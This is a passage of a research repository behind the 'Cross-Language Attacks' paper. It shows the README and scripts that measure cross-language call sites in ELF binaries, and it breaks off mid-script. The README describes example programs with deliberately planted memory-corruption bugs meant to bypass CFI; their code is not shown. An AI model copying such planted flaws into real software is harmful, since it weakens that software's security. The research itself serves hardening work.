├── LICENSE
├── README.md
├── SPDX.spdx
├── cla-README.pdf
├── cla-metrics
    ├── .DS_Store
    ├── README.md
    ├── find_elf.sh
    ├── fn_metrics.py
    ├── input
    │   ├── .DS_Store
    │   ├── elfs
    │   │   └── .placeholder
    │   ├── objdumps
    │   │   └── .placeholder
    │   └── source-info.json
    └── output
    │   ├── .DS_Store
    │   ├── elf-results
    │       └── .placeholder
    │   ├── graphs
    │       └── .placeholder
    │   └── obj-results
    │       └── .placeholder
├── go-cla-examples
    ├── Makefile
    └── src
    │   ├── init
    │       ├── init.c
    │       └── init.h
    │   └── main.go
└── rust-cla-examples
    ├── Cargo.lock
    ├── Cargo.toml
    ├── Makefile
    ├── build.rs
    └── src
        ├── init
            ├── init.c
            └── init.h
        └── main.rs


/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2022 MIT Lincoln Laboratory
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Overview
 2 | 
 3 | This repository contains the source code behind the NDSS '22 paper "Cross-Language Attacks", available [here](TODO).
 4 | 
 5 | The paper shows that adding code in "safe" langauges such as Rust to applications in unsafe lanaguage such as C/C++ may undermine hardening techniques that have been applied to the C/C++ code.  This paradoxical result shows the importance of having well thought out and consistent threat models.  Here we provide the proofs of concept referenced in the paper, for both Rust and Go.  We also provide the analysis scripts we used to gauge how prevalent these vulnerabilities might be in Firefox.  
 6 | 
 7 | ## Objective
 8 | 
 9 | The objective of this project is to aid authors of multi-language software
10 | applications in hardening their code. Securing such applications effectively
11 | requires understanding the threat model that they face, and how different
12 | defenses compose. We hope that our exploration of this subject results in more
13 | secure software.
14 | 
15 | # Directory Layout
16 | 
17 | ## rust-cla-examples
18 | 
19 | In this directory, one can find a mixed language application (MLA) with both Rust and C code that is vulnerable to a number of Cross Language Attacks (CLAs). The C side of the program can either be compiled as a static library (libinit.a) or a dynamic shared library (libinit.so). Furthermore, the C library is compiled with Control Flow Integrity (CFI) to prevent code-reuse attacks. However, the C code contains a series of spatial memory corruption out-of-bound errors (OOB) and temporal corruption use-after-free (UAF) or double free errors that an attacker can leverage to degrade the spatial and temporal safety of Rust or by-pass the CFI protection on the C library.   
20 | 
21 | ## go-cla-examples
22 | In this directory, one can find another mixed language application (MLA) with both Go and C code that is vulnerable to a number of Cross Language Attacks (CLAs). Similar to the Rust MLA example, the C side of the program can be compiled separately as a static library (libinit.a) or a dynamic shared library (libinit.so). In fact, these CLA examples contain a similar set of attacks as the Rust MLA.  
23 | 
24 | ## cla-metrics
25 | A series of scripts to analyze mixed-language binaries for metrics that indicate the opportunity for a Cross-Language Attack (CLA).
26 | 
27 | # Disclaimer
28 | 
29 | Cross-Language Attacks is distributed under the terms of the MIT License 
30 | DISTRIBUTION STATEMENT A. Approved for public release: distribution unlimited.
31 | 
32 | © 2021 MASSACHUSETTS INSTITUTE OF TECHNOLOGY
33 | 
34 | 
35 |     Subject to FAR 52.227-11 – Patent Rights – Ownership by the Contractor (May 2014)
36 |     SPDX-License-Identifier: MIT
37 | 
38 | This material is based upon work supported by the Under Secretary of Defense (USD) for Research & Engineering (R&E) under Air Force Contract No. FA8702-15-D-0001. Any opinions, findings, conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of USD (R&E).
39 | 
40 | The software/firmware is provided to you on an As-Is basis
41 | 


--------------------------------------------------------------------------------
/SPDX.spdx:
--------------------------------------------------------------------------------
1 | SPDXVersion: SPDX-2.1
2 | PackageName: Cross-Language Attacks
3 | PackageHomePage: https://github.com/mit-ll/cross-language-attacks/
4 | PackageOriginator: MIT Lincoln Laboratory
5 | PackageCopyrightText:2021 Massachusetts Institute of Technology
6 | PackageLicenseDeclared: MIT
7 | 


--------------------------------------------------------------------------------
/cla-README.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mit-ll/Cross-Language-Attacks/77532b04006dd4e4de017f3bf502751ae47f3722/cla-README.pdf


--------------------------------------------------------------------------------
/cla-metrics/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mit-ll/Cross-Language-Attacks/77532b04006dd4e4de017f3bf502751ae47f3722/cla-metrics/.DS_Store


--------------------------------------------------------------------------------
/cla-metrics/README.md:
--------------------------------------------------------------------------------
1 | # cla-metrics
2 | A series of scripts to analyze mixed-language binaries for metrics that indicate the opportunity for a Cross-Language Attack (CLA).
3 | 


--------------------------------------------------------------------------------
/cla-metrics/find_elf.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Used to collect a list of file names from a directory (recursively) that are elfs
 4 | 
 5 | # Input is the path to the search directory
 6 | path=$1
 7 | 
 8 | echo "Finding ELFs..."
 9 | 
10 | # Count the number of / in path to strip files later
11 | char="/"
12 | stripped=${path//[^$char]/}
13 | num=${#stripped}
14 | 
15 | if [ -f input/files.txt ]
16 | then
17 |   echo "Cleaning up input/files.txt"
18 |   rm input/files.txt
19 |   echo "Cleaning up input/elfs/"
20 |   rm input/elfs/*
21 |   echo "Cleaning up input/objdumps/"
22 |   rm input/objdumps/*
23 | fi
24 | 
25 | shopt -s globstar
26 | 
27 | count=0
28 | for f in $path**/*
29 | do
30 |   if file -L $f | grep -qi elf  
31 |   then
32 |     # Skip certain files
33 |     if [[ $f =~ "Test" ]]
34 |     then
35 |       printf "Skipping $f\n"
36 |       continue 
37 |     fi
38 | 
39 |     if [[ $f == *.jsm ]]
40 |     then
41 |       printf "Skipping $f\n"
42 |       continue 
43 |     fi
44 | 
45 |     if [[ $f == *.objdump ]]
46 |     then
47 |       printf "Skipping $f\n"
48 |       continue 
49 |     fi
50 | 
51 |     # holds binary name
52 |     b=$f
53 | 
54 |     # strip path from binary name
55 |     for i in $(eval echo {1..$num})
56 |     do
57 |         b="${b#*/}"
58 |     done
59 | 
60 |     # count remaining paths for this file
61 |     strippedb=${b//[^$char]/}
62 |     numb=${#strippedb}
63 | 
64 |     # strip rest of path from binary name
65 |     for i in $(eval echo {1..$numb})
66 |     do
67 |         b="${b#*/}"
68 |     done
69 | 
70 |     ((count+=1))
71 |     printf "File #$count: $b\n"
72 |     objdump -d $f > input/objdumps/$b.objdump
73 |     cp $f input/elfs/$b.elf
74 |     echo $b >> input/files.txt
75 |   fi
76 | done
77 | 


--------------------------------------------------------------------------------
/cla-metrics/fn_metrics.py:
--------------------------------------------------------------------------------
   1 | #!/usr/bin/python
   2 | # Authors: Samuel Mergendahl and Nathan Burow 
   3 | # Copyright: MIT Lincoln Laboratory
   4 | 
   5 | import sys
   6 | import re
   7 | import struct
   8 | import json
   9 | import numpy as np
  10 | import matplotlib
  11 | import matplotlib.pyplot as plt
  12 | 
  13 | from argparse import ArgumentParser
  14 | from elftools.elf.elffile import ELFFile
  15 | 
  16 | # Object that helps retrieve CLA-relevant info from an ELF File 
  17 | class Tagger:
  18 | 
  19 |     # Initializes the Tagger Class
  20 |     def __init__(self, e, f, r_path, n):
  21 | 
  22 |         # Tags holds all the metadata
  23 |         self.tags = {}
  24 | 
  25 |         # elf holds functions to search the elffile
  26 |         #with open(e_path, "rb") as f:
  27 |         self.elf = ELFFile(e)
  28 | 
  29 |         # fns holds incoming metadata derived from the high-level source
  30 |         #with open(f_path, "rb") as f:
  31 |         self.fns = json.load(f)
  32 | 
  33 |         # res holds the path to store derived metadata
  34 |         self.res = r_path
  35 | 
  36 |         # bin_name holds the name of the elf binary
  37 |         self.bin_name = n
  38 | 
  39 |         # Main language variable defaults to c++
  40 |         self.main_lang = "c++"
  41 | 
  42 |         # elf assembly flavor 
  43 |         self.assembly = "x86"
  44 | 
  45 |     # Main function to append metadata to tags
  46 |     def tag(self, name, field, tag):
  47 | 
  48 |         # Adds a newly seen function to the metadata
  49 |         if name not in self.tags:
  50 |             self.tags[name] = {field:tag}
  51 | 
  52 |         # Adds a newly seen metadata field to an already seen function
  53 |         elif field not in self.tags[name]:
  54 |             self.tags[name][field] = tag
  55 | 
  56 |         # Appends metadata to an already seen field for a function
  57 |         else:
  58 |             tmp = self.tags[name][field]
  59 |             if type(tmp) is not list:
  60 |                 tmp = [tmp]
  61 |             tmp.append(tag)
  62 |             self.tags[name][field] = tmp
  63 | 
  64 |     # Finds all the function names and initializes the tags metadata with all function names in elf
  65 |     def get_all_fns(self):
  66 | 
  67 |         # Check if we can use dwarf information
  68 |         if self.elf.has_dwarf_info:
  69 |             print(str(self.bin_name) + " has dwarf info!")
  70 |             dwarf_info = self.elf.get_dwarf_info()
  71 | 
  72 |         # Iterate through the entire symbol table
  73 |         stab = self.elf.get_section_by_name(".symtab")
  74 |         for symb in stab.iter_symbols():
  75 | 
  76 |             # Ignore empty, already seen, and symbol names without an address
  77 |             # TODO: should we add a not null qualifier? 
  78 |             if symb.name != "" and symb.name not in self.tags and symb["st_value"] != 0:
  79 | 
  80 |                 # Symbol table value is virtual address, so make relative to .text
  81 |                 text = self.elf.get_section_by_name(".text")
  82 |                 offset = symb["st_value"] - text["sh_addr"]
  83 |                 size = symb["st_size"]
  84 |                 start = symb["st_value"]
  85 | 
  86 |                 self.tag(symb.name, "addr", symb["st_value"])
  87 | 
  88 |     # For each function in the ELF, determine if it is a static, dynamic, closure, etc. 
  89 |     def tag_function_type(self):
  90 |         # Check if we can use dwarf information
  91 |         if self.elf.has_dwarf_info:
  92 |             print(str(self.bin_name) + " has dwarf info!")
  93 |             dwarf_info = self.elf.get_dwarf_info()
  94 | 
  95 |         # Iterate through the entire symbol table
  96 |         stab = self.elf.get_section_by_name(".symtab")
  97 |         for symb in stab.iter_symbols():
  98 | 
  99 |             # Ignore empty, null, and symbol names without an address
 100 |             if symb.name != "" and symb.name and symb["st_value"] != 0:
 101 | 
 102 |                 # Some shorter names
 103 |                 name = symb.name
 104 |                 fn = symb 
 105 | 
 106 |                 # No need to work if we already identified the type 
 107 |                 if "type" not in self.tags[fn.name]:
 108 | 
 109 |                     # Tag v0 mangler types
 110 |                     if fn.name.startswith('_R'):
 111 | 
 112 |                         # Set main language global as rust since only rust uses v0
 113 |                         self.main_lang = "rust"
 114 | 
 115 |                         # Closure
 116 |                         if 'CN' in fn.name:
 117 |                             self.tag(name, "type", "closure")
 118 |                         # TODO: Dynamic dispatch
 119 |                         #elif 'N' in fn.name:
 120 |                         #    self.tag(name, "type", "dynamic")
 121 |                         # Generic arguments impl
 122 |                         elif 'IN' in fn.name:
 123 |                             self.tag(name, "type", "static")
 124 |                         # Inherit impl root
 125 |                         elif 'X' in fn.name:
 126 |                             self.tag(name, "type", "static")
 127 |                         # Trait impl root
 128 |                         elif 'M' in fn.name:
 129 |                             self.tag(name, "type", "static")
 130 |                         elif 'N' in fn.name:
 131 |                             self.tag(name, "type", "free_fn")
 132 | 
 133 |                     # Tag lagacy mangler types
 134 |                     elif fn.name.startswith('_Z'):
 135 | 
 136 |                         # Set main language global as c++ 
 137 |                         # (assume that rust is compiled with v0)
 138 |                         self.main_lang = "c++"
 139 | 
 140 |                         # TODO: More expressive function types for C++
 141 |                         if 'ZN' in fn.name:
 142 |                             self.tag(name, "type", "static")
 143 |                         else:
 144 |                             self.tag(name, "type", "free_fn")
 145 | 
 146 |                     # This script only analyzes v0 Rust manglers or typical C++ manglers 
 147 |                     else:
 148 |                         self.tag(name, "type", "unknown")
 149 | 
 150 |     # For each function in the ELF, determine if it is a C/C++ or Rust function 
 151 |     def tag_language(self):
 152 | 
 153 |         # Check if we can use dwarf information
 154 |         if self.elf.has_dwarf_info:
 155 |             print(str(self.bin_name) + " has dwarf info!")
 156 |             dwarf_info = self.elf.get_dwarf_info()
 157 | 
 158 |         # Use source level info to get language
 159 |         stab = self.elf.get_section_by_name(".symtab")
 160 |         if "rust" in self.fns.keys():
 161 |             if self.fns["rust"]:
 162 |                 for rust_fn in self.fns["rust"]:
 163 |                     possible_funcs = list(filter(lambda s: rust_fn == s.name, stab.iter_symbols()))
 164 |                     for fn in possible_funcs:
 165 |                         print("tagging " + str(fn.name) + " as a rust function")
 166 |                         self.tag(fn.name, "lang", "rust")
 167 | 
 168 |         if "c++" in self.fns.keys():
 169 |             if self.fns["c++"]:
 170 |                 for c_fn in self.fns["c++"]:
 171 |                     possible_funcs = list(filter(lambda s: c_fn == s.name, stab.iter_symbols()))
 172 |                     for fn in possible_funcs:
 173 |                         print("tagging " + str(fn.name) + " as a c++ function")
 174 |                         self.tag(fn.name, "lang", "c++")
 175 | 
 176 |         if "c" in self.fns.keys():
 177 |             if self.fns["c"]:
 178 |                 for c_fn in self.fns["c"]:
 179 |                     possible_funcs = list(filter(lambda s: c_fn == s.name, stab.iter_symbols()))
 180 |                     for fn in possible_funcs:
 181 |                         print("tagging " + str(fn.name) + " as a c function")
 182 |                         self.tag(fn.name, "lang", "c")
 183 | 
 184 |         # Use name mangling info to get language
 185 |         stab = self.elf.get_section_by_name(".symtab")
 186 |         for symb in stab.iter_symbols():
 187 | 
 188 |             # Ignore empty, null, and symbol names without an address
 189 |             if symb.name != "" and symb.name and symb["st_value"] != 0:
 190 | 
 191 |                 func_name = symb.name
 192 | 
 193 |                 # No need to work if we already identified the language 
 194 |                 if "lang" not in self.tags[symb.name]:
 195 |                     mangled = False
 196 | 
 197 |                     # Simple check to see if the name is mangled in any way
 198 |                     # I.e., if there is more than one uppercase character, assume mangled
 199 |                     # Okay to over estimate the mangled names, 
 200 |                     # as it will only underestimate the number of external functions
 201 |                     if sum(1 for c in symb.name if c.isupper()) > 0:
 202 |                         mangled = True
 203 | 
 204 |                     # tags the language and whether it is an external language call
 205 |                     if "lang" not in self.tags[func_name] and not mangled and self.tags[func_name]["type"] == "unknown" and self.main_lang == "c++":
 206 | 
 207 |                         # tag the language
 208 |                         if func_name.startswith("_"):
 209 |                             self.tag(func_name, "lang", "c")
 210 |                         else:
 211 |                             self.tag(func_name, "lang", "rust")
 212 | 
 213 |                         # also tag that it is an external language call
 214 |                         self.tags[func_name]["type"] = "external"
 215 | 
 216 |                     elif "lang" not in self.tags[func_name] and not mangled and self.tags[func_name]["type"] == "unknown" and self.main_lang == "rust":
 217 |                         # tag the language
 218 |                         if func_name.startswith("_"):
 219 |                             self.tag(func_name, "lang", "c")
 220 |                         else:
 221 |                             self.tag(func_name, "lang", "c++")
 222 | 
 223 |                         # also tag that it is an external language call
 224 |                         self.tags[func_name]["type"] = "external"
 225 | 
 226 |                     elif "lang" not in self.tags[func_name]:
 227 |                         # tag the language
 228 |                         self.tag(func_name, "lang", self.main_lang)
 229 | 
 230 |     # Save the collected tags metadata to a file
 231 |     def save_results(self):
 232 |         f = open(self.res, "w")
 233 |         json.dump(self.tags, f, indent=4)
 234 | 
 235 | # This function uses the Tagger class to generate
 236 | # the function types and language of each function in the elf file 
 237 | # Stores results in a json file
 238 | def generate_elf_metrics(elf_path, fns_path, results_path, binary):
 239 |     print("Started ELF Tagging.")
 240 |     tagger = Tagger(elf_path, fns_path, results_path, binary)
 241 | 
 242 |     print("Initializing tags...")
 243 |     tagger.get_all_fns()
 244 | 
 245 |     print("Tagging function types...")
 246 |     tagger.tag_function_type()
 247 | 
 248 |     print("Tagging language...")
 249 |     tagger.tag_language()
 250 | 
 251 |     print("Saving results...")
 252 |     tagger.save_results()
 253 | 
 254 | # This function generates metrics for a series of elf binaries
 255 | # file path is a text file that holds the names of a bunch of elf files
 256 | def elf_reader(file_path):
 257 | 
 258 |     with open(file_path) as f:
 259 |         lines = [line.rstrip() for line in f]
 260 | 
 261 |         for binary in lines:
 262 |             # Skip jsm executables
 263 |             if "jsm" not in binary:
 264 |                 print("Generating elf metrics for: " + str(binary))
 265 |                 with open("input/source-info.json", "rb") as fns:
 266 |                     try:
 267 |                         with open("input/elfs/" + str(binary) + ".elf", "rb") as e:
 268 |                             generate_elf_metrics(e, fns, "output/elf-results/" + str(binary) + "_results.json", str(binary))
 269 |                     except IOError:
 270 |                         print("Error " + str(binary) + " does not exist.")
 271 | 
 272 | 
 273 | def generate_obj_metrics(obj_path, binary):
 274 |     functionStartRegex=re.compile(r"^[\da-f]{16} <.+>:$")
 275 |     callRegex = re.compile(r"call")
 276 |     functionName=re.compile(r"<(.+)>:?$")
 277 |     indirectCallRegex = re.compile(r"call.? *")
 278 |     
 279 |     functionToCalls = {}
 280 |     curFunc = ""
 281 |     indirectCallCount = 0
 282 |     count = 0
 283 |     with open(obj_path, "r") as fp:
 284 |         for line in fp:
 285 |             function = functionStartRegex.search(line)
 286 |             if function:
 287 |                 name = functionName.search(line)
 288 |                 if name:
 289 |                     #print("Current Function: " + str(name.group(1))
 290 |                     #TODO: check if this function already exists and handle it
 291 |                     #gracefully if so
 292 |                     functionToCalls[name.group(1)] = []
 293 |                     if curFunc:
 294 |                         functionToCalls[curFunc].append(indirectCallCount)
 295 |                         #if indirectCallCount:
 296 |                         #    print(str(curFunc) + " has " + str(indirectCallCount) + " indirect calls")
 297 |                     indirectCallCount = 0
 298 |                     curFunc = name.group(1)
 299 |                 else:
 300 |                     print("Couldn't find function name for line: " + str(line))
 301 |                     sys.exit(1)
 302 |             call = callRegex.search(line)
 303 |             if call:
 304 |                 name = functionName.search(line)
 305 |                 if name:
 306 |                     #print("\tCalls: " + str(name.group(1)))
 307 |                     functionToCalls[curFunc].append(name.group(1))
 308 |                 else:
 309 |                     if indirectCallRegex.search(line):
 310 |                         #print("Couldn't find name for: " + str(line) + " assuming indirect call")
 311 |                         indirectCallCount += 1
 312 |                     else:
 313 |                         print("Error on line: " + str(line))
 314 |                         print("Neither direct nor indirect")
 315 |                         sys.exit(1)
 316 |             count +=1;
 317 |             if count % 1000000 == 0:
 318 |                 print(str(count / float(87087059) * 100) + "% complete")
 319 |    
 320 |     with open("output/obj-results/" + str(binary) + "_results.json", "w") as fp:
 321 |         json.dump(functionToCalls, fp, indent=4)
 322 | 
 323 | # This function generates metrics for a series of objdumps 
 324 | # file path is a text file that holds the names of a bunch of objdump files
 325 | def obj_reader(file_path):
 326 | 
 327 |     with open(file_path) as f:
 328 |         lines = [line.rstrip() for line in f]
 329 | 
 330 |         for binary in lines:
 331 |             # Skip jsm executables
 332 |             if "jsm" not in binary:
 333 |                 print("Generating obj metrics for: " + str(binary))
 334 |                 generate_obj_metrics("input/objdumps/" + str(binary) + ".objdump", str(binary))
 335 | 
 336 | # Combine objdump file processing from output/obj-results/ into one json file
 337 | def combine_obj_results(file_path):
 338 |     full_json = {} 
 339 | 
 340 |     with open(file_path) as f:
 341 |         lines = [line.rstrip() for line in f]
 342 |         for binary in lines:
 343 |             try:
 344 |                 with open("output/obj-results/" + str(binary) + "_results.json") as j:
 345 |                     res_data = json.load(j)
 346 | 
 347 |                     for fn_name in res_data.keys():
 348 |                         res_data_list = res_data[fn_name]
 349 |                         tmp_dict = {}
 350 |                         tmp_call_list = []
 351 | 
 352 |                         # Strip indirect calls
 353 |                         if not res_data_list:
 354 |                             num_indir_calls = float(0)
 355 |                         else:
 356 |                             num_indir_calls = res_data_list[-1]
 357 |                         tmp_dict["num_indirect_calls"] = num_indir_calls
 358 | 
 359 |                         # Strip dynamic calls info from name
 360 |                         tmp_dict["num_dynamic_calls"] = float(0)
 361 |                         if len(res_data_list) > 1:
 362 |                             for cs in res_data_list[0:-2]: 
 363 | 
 364 |                                 # add @binary on the end of call site
 365 |                                 if '@' in str(cs):
 366 |                                     tmp_dict["num_dynamic_calls"] = tmp_dict["num_dynamic_calls"]+1
 367 |                                 else:
 368 |                                     cs = str(cs) + '@' + str(binary)
 369 | 
 370 |                                 # add to set first to prevent duplicates 
 371 |                                 tmp_set = set(tmp_call_list)
 372 |                                 tmp_set = tmp_set.union(set([cs]))
 373 |                                 tmp_call_list = list(tmp_set)
 374 |                                 #tmp_call_list.append(cs)
 375 | 
 376 |                         tmp_dict["call_sites"] = tmp_call_list 
 377 | 
 378 |                         # Add a unique token for the function to prevent repeated functions 
 379 |                         if '@' in str(fn_name):
 380 |                             full_json[str(fn_name)] = tmp_dict 
 381 |                         else:
 382 |                             full_json[str(fn_name) + "@" + str(binary)] = tmp_dict 
 383 | 
 384 |             except IOError:
 385 |                 print("Error " + str(binary) + " does not have any obj results.")
 386 | 
 387 |     f = open("output/obj-results/full.json", "w")
 388 |     json.dump(full_json, f, indent=4)
 389 | 
 390 | # Combine elf file processing from output/elf-results/ into one json file
 391 | def combine_elf_results(file_path):
 392 |     full_json = {} 
 393 | 
 394 |     with open(file_path) as f:
 395 |         lines = [line.rstrip() for line in f]
 396 |         for binary in lines:
 397 |             try:
 398 |                 with open("output/elf-results/" + str(binary) + "_results.json") as j:
 399 |                     res_data = json.load(j)
 400 | 
 401 |                     for fn_name in res_data.keys():
 402 |                         full_json[str(fn_name) + "@" + str(binary)] = res_data[fn_name]
 403 | 
 404 |             except IOError:
 405 |                 print("Error " + str(binary) + " does not have any elf results.")
 406 | 
 407 |     f = open("output/elf-results/full.json", "w")
 408 |     json.dump(full_json, f, indent=4)
 409 | 
 410 | # Combine elf processing with objump processing
 411 | def combine_elf_and_obj_results():
 412 |     print("Opening elf results...")
 413 |     with open("output/elf-results/full.json") as fj:
 414 |         full_json = json.load(fj)
 415 | 
 416 |         print("Opening objdump results...")
 417 |         with open("output/obj-results/full.json") as dj:
 418 |             dump = json.load(dj)
 419 | 
 420 |             print("Iterating through objdump functions for std lib call sites...")
 421 |             for name in dump.keys():
 422 |                 for cs in dump[name]["call_sites"]:
 423 |                     if cs not in full_json:
 424 |                         if "+0x" not in cs:
 425 |                             if "LIBCXX" in cs or "libcxx" in cs or "LIBC++" in cs or "libc++" in cs or "GXX" in cs or "gxx" in cs: 
 426 |                                 full_json[cs] = {
 427 |                                         "addr": "unknown",
 428 |                                         "type": "free_fn",
 429 |                                         "lang": "c++",
 430 |                                         "call_sites": [],
 431 |                                         "num_indirect_calls": float(0),
 432 |                                         "num_dynamic_calls": float(0),
 433 |                                         }
 434 |                             elif "LIBC" in cs or "libc" in cs or "GCC" in cs or "GXX" in cs or "NSS" in cs or "nss" in cs:
 435 |                                 full_json[cs] = {
 436 |                                         "addr": "unknown",
 437 |                                         "type": "external",
 438 |                                         "lang": "c",
 439 |                                         "call_sites": [],
 440 |                                         "num_indirect_calls": float(0),
 441 |                                         "num_dynamic_calls": float(0),
 442 |                                         }
 443 | 
 444 |             print("Iterating through objdump functions...")
 445 |             for name in dump.keys():
 446 | 
 447 |                 if name in full_json.keys():
 448 |                     call_list = dump[name]["call_sites"]
 449 |                     try:
 450 |                         num_indirect = float(dump[name]["num_indirect_calls"])
 451 |                         num_dynamic = float(dump[name]["num_dynamic_calls"])
 452 |                     except Exception as e:
 453 |                         print(e)
 454 |                         print("...saving as 0 instead...")
 455 |                         num_indirect = float(0) 
 456 |                         num_dynamic = float(0) 
 457 | 
 458 |                     # Adds a call_sites metadata field to an already seen function
 459 |                     if "call_sites" not in full_json[name]:
 460 |                         full_json[name]["call_sites"] = call_list 
 461 |                         full_json[name]["num_indirect_calls"] = num_indirect 
 462 |                         full_json[name]["num_dynamic_calls"] = num_dynamic 
 463 | 
 464 |                     # Appends metadata to an already seen call_cites for a function
 465 |                     else:
 466 |                         tmp = full_json[name]["call_sites"]
 467 |                         tmp_set = set(tmp)
 468 |                         tmp_set = tmp_set.union(set(call_list))
 469 |                         full_json[name]["call_cites"] = list(tmp_set)
 470 | 
 471 |                         full_json[name]["num_indirect_calls"] = full_json[name]["num_indirect_calls"] + num_indirect 
 472 |                         full_json[name]["num_dynamic_calls"] = full_json[name]["num_dynamic_calls"] + num_dynamic 
 473 |                 else:
 474 |                     # Objdump found a function that the elf files couldn't
 475 |                     # Temporary solution: check if objdump has it as a @plt functions 
 476 |                     # Ignore all other cases
 477 |                     found = False
 478 |                     if "@plt" in name:
 479 |                         stripped_name = str(name).split('@')[0]
 480 | 
 481 |                         for n in full_json.keys():
 482 |                             if n.startswith(stripped_name) and not found:
 483 | 
 484 |                                 # Same as if we found it above, but need to use n to save rather than name
 485 |                                 call_list = dump[name]["call_sites"]
 486 |                                 try:
 487 |                                     num_indirect = float(dump[name]["num_indirect_calls"])
 488 |                                     num_dynamic = float(dump[name]["num_dynamic_calls"])
 489 |                                 except Exception as e:
 490 |                                     print(e)
 491 |                                     print("...saving as 0 instead...")
 492 |                                     num_indirect = float(0) 
 493 |                                     num_dynamic = float(0) 
 494 | 
 495 |                                 # Adds a call_sites metadata field to an already seen function
 496 |                                 if "call_sites" not in full_json[n]:
 497 |                                     full_json[n]["call_sites"] = call_list 
 498 |                                     full_json[n]["num_indirect_calls"] = num_indirect 
 499 |                                     full_json[n]["num_dynamic_calls"] = num_dynamic 
 500 | 
 501 |                                 # Appends metadata to an already seen call_cites for a function
 502 |                                 else:
 503 |                                     tmp = full_json[n]["call_sites"]
 504 |                                     tmp_set = set(tmp)
 505 |                                     tmp_set = tmp_set.union(set(call_list))
 506 |                                     full_json[n]["call_cites"] = list(tmp_set)
 507 | 
 508 |                                     full_json[n]["num_indirect_calls"] = full_json[n]["num_indirect_calls"] + num_indirect 
 509 |                                     full_json[n]["num_dynamic_calls"] = full_json[n]["num_dynamic_calls"] + num_dynamic 
 510 | 
 511 |                                 found = True
 512 | 
 513 |                         if not found:
 514 |                             found = True
 515 | 
 516 |                             call_list = dump[name]["call_sites"]
 517 |                             try:
 518 |                                 num_indirect = float(dump[name]["num_indirect_calls"])
 519 |                                 num_dynamic = float(dump[name]["num_dynamic_calls"])
 520 |                             except Exception as e:
 521 |                                 print(e)
 522 |                                 print("...saving as 0 instead...")
 523 |                                 num_indirect = float(0) 
 524 |                                 num_dynamic = float(0) 
 525 | 
 526 |                             if "_Z" in name:
 527 |                                 t = "unknown"
 528 |                                 l = "c++"
 529 |                             else:
 530 |                                 t = "external"
 531 |                                 l = "c"
 532 | 
 533 |                             full_json[name] = {
 534 |                                     "addr": "unknown",
 535 |                                     "type": t,
 536 |                                     "lang": l,
 537 |                                     "call_sites": call_list,
 538 |                                     "num_indirect_calls": num_indirect,
 539 |                                     "num_dynamic_calls": num_dynamic,
 540 |                                     }
 541 | 
 542 |                     if not found:
 543 |                         print("Not in full: " + str(name))
 544 | 
 545 |             for name in full_json.keys():
 546 |                 # ELF found a function that the objdump files couldn't
 547 |                 # TODO: Should we really set this as zero, or "unknown"?
 548 | 
 549 |                 if "call_sites" not in full_json[name]:
 550 |                     full_json[name]["call_sites"] = []
 551 |                 if "num_indirect_calls" not in full_json[name]:
 552 |                     full_json[name]["num_indirect_calls"] = float(0)
 553 |                 if "num_dynamic_calls" not in full_json[name]:
 554 |                     full_json[name]["num_dynamic_calls"] = float(0)
 555 | 
 556 | 
 557 |     # Save combined results
 558 |     print("Saving combined elf and objdump metadata...")
 559 |     f = open("output/metadata.json", "w")
 560 |     json.dump(full_json, f, indent=4)
 561 | 
 562 | # Add transfer point data to metadata using call sites and language tags
 563 | def get_transfer_points():
 564 |     print("Opening metadata to find transfer and visitor points...")
 565 |     with open("output/metadata.json") as mj:
 566 |         md = json.load(mj)
 567 | 
 568 |         # For each function, get a list of its call sites that cross a language
 569 |         print("Iterating through metadata functions...")
 570 |         md_keys_copy = md.keys()
 571 |         count = 0
 572 |         percent = 0
 573 | 
 574 |         for fn in md_keys_copy:
 575 |             print(str(count) + " of " + str(len(md_keys_copy)) + " complete.")
 576 |             count = count + 1
 577 |             if count % (len(md_keys_copy)/100) == 0:
 578 |                 percent = percent + 1
 579 |                 print(str(percent) + " percent complete...")
 580 | 
 581 |             if "call_sites" in md[fn] and "lang" in md[fn]:
 582 |                 call_sites_copy = md[fn]["call_sites"]
 583 |                 for cs in call_sites_copy:
 584 |                     if cs in md:
 585 |                         if "lang" in md[cs]:
 586 |                             if md[cs]["lang"] != md[fn]["lang"]:
 587 | 
 588 |                                 ### transfer points
 589 |                                 # Creates a transfer points metadata field to an already seen function
 590 |                                 if "transfer_points" not in md[fn]:
 591 |                                     md[fn]["transfer_points"] = [cs]
 592 | 
 593 |                                 # Appends metadata to an already seen transfer points list for a function
 594 |                                 else:
 595 |                                     tmp = md[fn]["transfer_points"]
 596 |                                     tmp_set = set(tmp)
 597 |                                     tmp_set = tmp_set.union(set([cs]))
 598 |                                     md[fn]["transfer_points"] = list(tmp_set)
 599 | 
 600 |                                 ### visitor points 
 601 |                                 # Creates a visitor points metadata field to an already seen function
 602 |                                 if "visitor_points" not in md[cs]:
 603 |                                     md[cs]["visitor_points"] = [fn]
 604 | 
 605 |                                 # Appends metadata to an already seen transfer points list for a function
 606 |                                 else:
 607 |                                     tmp = md[cs]["visitor_points"]
 608 |                                     tmp_set = set(tmp)
 609 |                                     tmp_set = tmp_set.union(set([fn]))
 610 |                                     md[cs]["visitor_points"] = list(tmp_set)
 611 |                         else:
